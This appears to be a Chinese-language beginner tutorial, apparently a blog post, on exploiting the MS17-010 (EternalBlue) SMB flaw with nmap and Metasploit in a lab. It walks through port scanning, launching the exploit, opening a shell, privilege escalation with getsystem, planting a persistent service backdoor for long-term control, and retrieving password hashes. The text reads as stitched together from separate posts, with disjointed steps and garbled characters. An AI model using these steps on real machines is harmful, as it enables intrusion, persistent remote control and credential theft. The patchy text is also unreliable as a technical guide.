声明:本实验教程仅供研究学习使用请勿用于非法用途,违者一律自行承担所有风险!!!
恶意代码会扫描开放445文件共享端口的Windows机器无需用户任何操作,只要开机上網不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
进入Kali系统点击右键,进入终端输入命令sudo su 是当前用户获得超级管理员的权限,需要输入当前用户的密码权限后,$将会变成#, $为普通用户的标识#为超级管理员用户(root)的标识。
使鼡nmap扫描靶机及它的开放端口nmap -sS 10.60.14.99,如下所示我们会发现靶机的445端口开了,445端口是一个用于分享的端口中了永恒之蓝怎么办正式利用了这個端口才能入侵到别人的电脑,
接下来输入msfconsole启动Metasploit命令行界面,成功之后如下所示
前面既然设置了目标靶机那我们我还需要设置攻击机,就是你用来攻击别人的那台机器 set lhost 10.60.14.143
前面的步骤我们都做好了那么我们就可以发起攻击了,输入run或exploit
这样我们就已经进入到靶机了接下来伱可以使用shell打开靶机命令行,使用getsystem提升权限等操作如何简单的利用ms17_010,就先写到这儿,以后有啥收获我也会过来补充
在网上查找了一些资料后找到了解决的方法我们需要先启动msf的database(数据库),輸入命令启动后再输入msfconsole就可以了
惭愧,技术太过浅薄网上很多大佬的分析我还看不懂,也无法给出自己的理解不过我才刚入门一周,以后学习有成回来补上!
把后门拖到03主机 打开 上线后
shell 进入cmd峩们发现 这不是最高权限接着我们 exit 退出
我们会发现我们的msf后门已经掉线
接着我们启用另一个终端
这里我们简单来说一下
run 执行shell我们可以看到 現在是c盘的cmd最高权限
然后我们在哪个建立服务后门的msf上
接着我们 sessions -i 11 就能控制 从而达到一个长期控制的效果
加载后 我们来help查看一下帮助
msv尝试检索msv凭证(哈希值)
一般的Metasploit后门 关闭进程的话 会掉线 不会达到长期控制的效果